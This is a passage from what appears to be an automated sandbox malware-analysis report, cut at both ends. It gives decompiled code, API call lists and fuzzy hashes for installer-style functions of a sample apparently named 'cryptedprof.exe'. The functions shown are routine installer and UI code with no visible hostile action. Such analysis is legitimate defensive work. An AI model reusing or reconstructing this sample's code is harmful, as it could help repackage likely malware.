								case 5:
									if( *__ebx != 0) {
										__eax = E709912FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x7099405c;
									__esi = __esi +  *0x70994064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E70991429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E70991224(0x70994034);
					goto L10;
				}
			}












                                                                                        0x70992306
                                                                                        0x7099230a
                                                                                        0x70992315
                                                                                        0x70992315
                                                                                        0x7099231c
                                                                                        0x70992321
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992325
                                                                                        0x70992328
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099232d
                                                                                        0x70992338
                                                                                        0x70992348
                                                                                        0x7099233f
                                                                                        0x70992341
                                                                                        0x70992357
                                                                                        0x70992357
                                                                                        0x00000000
                                                                                        0x7099232f
                                                                                        0x7099232f
                                                                                        0x70992358
                                                                                        0x7099235c
                                                                                        0x7099235e
                                                                                        0x7099235e
                                                                                        0x70992361
                                                                                        0x70992361
                                                                                        0x70992369
                                                                                        0x7099236c
                                                                                        0x70992373
                                                                                        0x70992377
                                                                                        0x70992446
                                                                                        0x70992447
                                                                                        0x70992452
                                                                                        0x7099247d
                                                                                        0x7099247d
                                                                                        0x70992462
                                                                                        0x7099246e
                                                                                        0x70992464
                                                                                        0x70992464
                                                                                        0x70992464
                                                                                        0x00000000
                                                                                        0x7099237d
                                                                                        0x7099237d
                                                                                        0x00000000
                                                                                        0x70992384
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099238d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099239b
                                                                                        0x7099239e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709923a7
                                                                                        0x709923ac
                                                                                        0x709923af
                                                                                        0x709923b0
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x709923bd
                                                                                        0x709923c8
                                                                                        0x709923d7
                                                                                        0x709923e2
                                                                                        0x70992405
                                                                                        0x70992408
                                                                                        0x709923e4
                                                                                        0x709923e8
                                                                                        0x709923ee
                                                                                        0x709923ef
                                                                                        0x709923f2
                                                                                        0x709923f3
                                                                                        0x709923f6
                                                                                        0x709923fd
                                                                                        0x709923fd
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992410
                                                                                        0x70992413
                                                                                        0x7099241f
                                                                                        0x70992421
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x70992424
                                                                                        0x70992427
                                                                                        0x70992428
                                                                                        0x7099242f
                                                                                        0x70992436
                                                                                        0x70992439
                                                                                        0x7099243b
                                                                                        0x7099243e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x7099237d
                                                                                        0x70992377
                                                                                        0x7099234d
                                                                                        0x70992352
                                                                                        0x00000000
                                                                                        0x70992352

                                                                                        APIs
                                                                                        • GlobalFree.KERNEL32 ref: 70992447
                                                                                          • Part of subcall function 70991224: lstrcpynA.KERNEL32(00000000,?,709912CF,-7099404B,709911AB,-000000A0), ref: 70991234
                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 709923C2
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 709923D7
                                                                                        • GlobalAlloc.KERNEL32(00000040,00000010), ref: 709923E8
                                                                                        • CLSIDFromString.OLE32(00000000,00000000), ref: 709923F6
                                                                                        • GlobalFree.KERNEL32 ref: 709923FD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                        • String ID: @u*v
                                                                                        • API String ID: 3730416702-1046951355
                                                                                        • Opcode ID: 88628f918c9a972f4bfce934c2bb5cfdb8397aa26ca201933fa2e38d097548dc
                                                                                        • Instruction ID: e5e7e5efd1fa835425aa1713fbb4671824da6f87bdf469f26850e5d12514970e
                                                                                        • Opcode Fuzzy Hash: 88628f918c9a972f4bfce934c2bb5cfdb8397aa26ca201933fa2e38d097548dc
                                                                                        • Instruction Fuzzy Hash: 98419C71528300EFD3119F21C845BAE77ECFBC4711F21892AF556DA2A0D738A904DB6B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406528, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00406528(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C52(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405C10("*?|<>/\":", _t5))) == 0) {
							E00405DA1(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                        0x0040652a
                                                                                        0x00406532
                                                                                        0x00406546
                                                                                        0x00406546
                                                                                        0x0040654c
                                                                                        0x00406559
                                                                                        0x00406559
                                                                                        0x0040655a
                                                                                        0x0040655c
                                                                                        0x00406560
                                                                                        0x00406562
                                                                                        0x0040656b
                                                                                        0x0040656d
                                                                                        0x00406587
                                                                                        0x0040658f
                                                                                        0x0040658f
                                                                                        0x00406594
                                                                                        0x00406596
                                                                                        0x00406598
                                                                                        0x0040659c
                                                                                        0x0040659d
                                                                                        0x004065a0
                                                                                        0x004065a8
                                                                                        0x004065aa
                                                                                        0x004065ae
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065b4
                                                                                        0x004065b9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004065b9
                                                                                        0x004065be

                                                                                        APIs
                                                                                        • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406580
                                                                                        • CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040658D
                                                                                        • CharNextA.USER32(?,"C:\Users\user\Desktop\cryptedprof.exe" ,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 00406592
                                                                                        • CharPrevA.USER32(?,?,747DFA90,C:\Users\user\AppData\Local\Temp\,00000000,00403461,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403698,?,00000007,00000009,0000000B), ref: 004065A2
                                                                                        Strings
                                                                                        • *?|<>/":, xrefs: 00406570
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00406564
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00406529
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Char$Next$Prev
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                        • API String ID: 589700163-1759631272
                                                                                        • Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                        • Instruction ID: 84dc9c54e44743018b56ada6ed00289937fbd1a3950c851798eb23a5f2cb525a
                                                                                        • Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
                                                                                        • Instruction Fuzzy Hash: CA1108514047A13AFB3216286C45B777F894F97754F1904BFE8C6722C6C67C5CA2827D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404338, Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00404338(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}









                                                                                        0x0040434a
                                                                                        0x00404400
                                                                                        0x00000000
                                                                                        0x00404400
                                                                                        0x0040435b
                                                                                        0x0040435f
                                                                                        0x00000000
                                                                                        0x00404379
                                                                                        0x00404379
                                                                                        0x00404382
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00404384
                                                                                        0x00404390
                                                                                        0x00404393
                                                                                        0x00404393
                                                                                        0x00404399
                                                                                        0x0040439f
                                                                                        0x0040439f
                                                                                        0x004043ab
                                                                                        0x004043b1
                                                                                        0x004043b8
                                                                                        0x004043bb
                                                                                        0x004043be
                                                                                        0x004043c0
                                                                                        0x004043c0
                                                                                        0x004043c8
                                                                                        0x004043ce
                                                                                        0x004043ce
                                                                                        0x004043d8
                                                                                        0x004043dd
                                                                                        0x004043e0
                                                                                        0x004043e5
                                                                                        0x004043e8
                                                                                        0x004043e8
                                                                                        0x004043f8
                                                                                        0x004043f8
                                                                                        0x00000000
                                                                                        0x004043fb

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                        • Instruction ID: 4e7267cb447ae131ba3d4846a02e3cb7cb8ad683d93e4e28d2f19cfe4ef5bf63
                                                                                        • Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
                                                                                        • Instruction Fuzzy Hash: A02174B15007049FCB319F78ED48B5BBBF8AF41714B04892EED96A26E1D738E914CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405374, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00405374(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42ec24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42f514;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062E0(0, _t39, 0x42a098, 0x42a098, _a4);
					}
					_t26 = lstrlenA(0x42a098);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x42ec08, 0x42a098);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42a098;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x42a098)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x42a098, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                                                                        0x0040537a
                                                                                        0x00405386
                                                                                        0x00405389
                                                                                        0x0040538f
                                                                                        0x0040539b
                                                                                        0x0040539e
                                                                                        0x004053a1
                                                                                        0x004053a7
                                                                                        0x004053a7
                                                                                        0x004053ad
                                                                                        0x004053b5
                                                                                        0x004053b8
                                                                                        0x004053d5
                                                                                        0x004053d9
                                                                                        0x004053e2
                                                                                        0x004053e2
                                                                                        0x004053ec
                                                                                        0x004053f5
                                                                                        0x00405401
                                                                                        0x00405408
                                                                                        0x0040540c
                                                                                        0x0040540f
                                                                                        0x00405422
                                                                                        0x00405430
                                                                                        0x00405430
                                                                                        0x00405434
                                                                                        0x00405436
                                                                                        0x00405439
                                                                                        0x00000000
                                                                                        0x00405439
                                                                                        0x004053ba
                                                                                        0x004053c2
                                                                                        0x004053ca
                                                                                        0x004053d0
                                                                                        0x00000000
                                                                                        0x004053d0
                                                                                        0x004053ca
                                                                                        0x004053b8
                                                                                        0x00405443

                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                        • lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                        • lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                        • SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID:
                                                                                        • API String ID: 2531174081-0
                                                                                        • Opcode ID: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                        • Instruction ID: d7eb592bfa4ea3045ae5f44a809824ecf19421b2f71a9c0c58d32ef0e79f5504
                                                                                        • Opcode Fuzzy Hash: 78efb24cfc6d426cc3f30feafde338b5d49fd2ff0c030ae89829439aee15dea2
                                                                                        • Instruction Fuzzy Hash: 0421AC71D00118BFCB11AFA5DD80ADEBFA9EF05354F50807AF904B22A0C7788E958B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x42946c;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x42946c = 0;
					return _t15;
				}
				if( *0x42946c != 0) {
					return E00406692(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42f450) {
					if( *0x42f448 == 0) {
						_t7 = CreateDialogParamA( *0x42f440, 0x6f, 0, E00402DBA, 0);
						 *0x42946c = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42f514 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E00405374(0,  &_v68);
					}
				}
				return _t6;
			}







                                                                                        0x00402e5e
                                                                                        0x00402e60
                                                                                        0x00402e67
                                                                                        0x00402e6a
                                                                                        0x00402e6a
                                                                                        0x00402e70
                                                                                        0x00000000
                                                                                        0x00402e70
                                                                                        0x00402e7e
                                                                                        0x00000000
                                                                                        0x00402e81
                                                                                        0x00402e88
                                                                                        0x00402e94
                                                                                        0x00402e9c
                                                                                        0x00402eda
                                                                                        0x00402ee3
                                                                                        0x00000000
                                                                                        0x00402ee8
                                                                                        0x00402ea5
                                                                                        0x00402eb6
                                                                                        0x00000000
                                                                                        0x00402ec4
                                                                                        0x00402ea5
                                                                                        0x00402ef0

                                                                                        APIs
                                                                                        • DestroyWindow.USER32(?,00000000), ref: 00402E6A
                                                                                        • GetTickCount.KERNEL32 ref: 00402E88
                                                                                        • wsprintfA.USER32 ref: 00402EB6
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
                                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402EE8
                                                                                          • Part of subcall function 00402E36: MulDiv.KERNEL32(?,00000064,?), ref: 00402E4B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                        • String ID: ... %d%%
                                                                                        • API String ID: 722711167-2449383134
                                                                                        • Opcode ID: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                        • Instruction ID: 353ceaab55596b447025a7e101de02e0418331127a37b2bc27e5d18c7d4c6952
                                                                                        • Opcode Fuzzy Hash: af689138a4f0791e1d33c6a99b0ca250243e8de88bd1a5e7849c729b12dc1877
                                                                                        • Instruction Fuzzy Hash: DA015E70581214ABCB61AB61EF0DA5B766CAB10745B94403BF901F11E0C7B9594ACBEE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00404C24, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00404C24(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                                        0x00404c32
                                                                                        0x00404c3f
                                                                                        0x00404c45
                                                                                        0x00404c83
                                                                                        0x00404c83
                                                                                        0x00404c92
                                                                                        0x00404c99
                                                                                        0x00000000
                                                                                        0x00404c9b
                                                                                        0x00404c47
                                                                                        0x00404c56
                                                                                        0x00404c5e
                                                                                        0x00404c61
                                                                                        0x00404c73
                                                                                        0x00404c79
                                                                                        0x00404c80
                                                                                        0x00000000
                                                                                        0x00404c80
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C3F
                                                                                        • GetMessagePos.USER32 ref: 00404C47
                                                                                        • ScreenToClient.USER32 ref: 00404C61
                                                                                        • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404C73
                                                                                        • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404C99
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                        • Instruction ID: c5e601a7729174d758105895f59292295b70f69fbdb61488410ae18d48939760
                                                                                        • Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
                                                                                        • Instruction Fuzzy Hash: C8015A71900219BAEB10DBA4DD85BFFBBBCAF55B21F10012BBA40B61D0C7B499058BA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x42f454 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                        0x00402dc7
                                                                                        0x00402dd5
                                                                                        0x00402ddb
                                                                                        0x00402ddb
                                                                                        0x00402de9
                                                                                        0x00402deb
                                                                                        0x00402df7
                                                                                        0x00402dfc
                                                                                        0x00402dfe
                                                                                        0x00402dfe
                                                                                        0x00402e09
                                                                                        0x00402e19
                                                                                        0x00402e2b
                                                                                        0x00402e2b
                                                                                        0x00402e33

                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                        • wsprintfA.USER32 ref: 00402E09
                                                                                        • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                        • SetDlgItemTextA.USER32 ref: 00402E2B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                        • API String ID: 1451636040-1158693248
                                                                                        • Opcode ID: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                        • Instruction ID: aa0a6e9b687c9e0f5cd6186ccbd59e0a61a019e4c0b35091a05eaf10890a9e1d
                                                                                        • Opcode Fuzzy Hash: e89816a8dfaa52ff9135695e85eb4a48f8702048c86a46640504a18df176bae7
                                                                                        • Instruction Fuzzy Hash: A5F06D7054020CFBEF206F60CE0ABAE3769EB10345F00803AFA06B51D0CBB899558F9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 93%
                                                                                        			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
